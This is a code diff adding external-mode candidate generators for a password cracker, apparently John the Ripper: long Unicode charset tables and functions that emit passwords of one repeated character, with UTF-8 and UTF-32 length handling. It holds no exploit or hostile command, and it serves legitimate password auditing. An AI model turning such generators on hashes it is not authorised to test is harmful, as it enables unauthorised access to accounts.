+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[maxc = i] = 0;
+
+	length = minlength; c = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i, cl, wl;
+
+	if (target_utf8) {
+		cl = 1;
+		if (charset[c] >= 0x80) {
+			cl++;
+			if (charset[c] >= 0x0800)
+				cl++;
+			wl = length * cl;
+			if (wl > cipher_limit) {
+				c = 0;
+				if (++length > maxlength) {
+					word = 0;
+					return;
+				}
+				cl = 1;
+				if (charset[0] >= 0x80) {
+					cl++;
+					if (charset[0] >= 0x0800)
+						cl++;
+					wl = length * cl;
+					if (wl > cipher_limit) {
+						word = 0;
+						return;
+					}
+				}
+			}
+		}
+	}
+
+	i = 0;
+	while (i < length)
+		word[i++] = charset[c];
+	word[i] = 0;
+
+	if (++c < maxc)
+		return;
+
+	c = 0;
+	if (++length > maxlength)
+		length = 0; // Will NUL out the next "word" and thus terminate
+
+	return;
+}
+
+/* Reset length & c */
+void restore()
+{
+	length = 0;
+
+	while (word[length]) {
+		length++;
+	}
+	c = word[0];
+}
@@ -0,0 +1,2378 @@
+# This software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Try strings of repeated characters, Full Unicode (version 11) version
+#
+# Number of candidates = 137,046 x length
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 12 bytes each).
+#
+# Also note that for UTF-16 formats, the resulting plaintext size within the
+# format will be up to four bytes (two 16-bit words) due to use of surrogates
+# for characters above U+FFFF. This means a format which normally handles up
+# to 27 characters may be limited to only 13 characters, worst case.
+[List.External:Repeats32]
+int minlength, maxlength, maxc, length, c;
+int charset[0x22000];
+
+void init()
+{
+	int i;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;
+
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
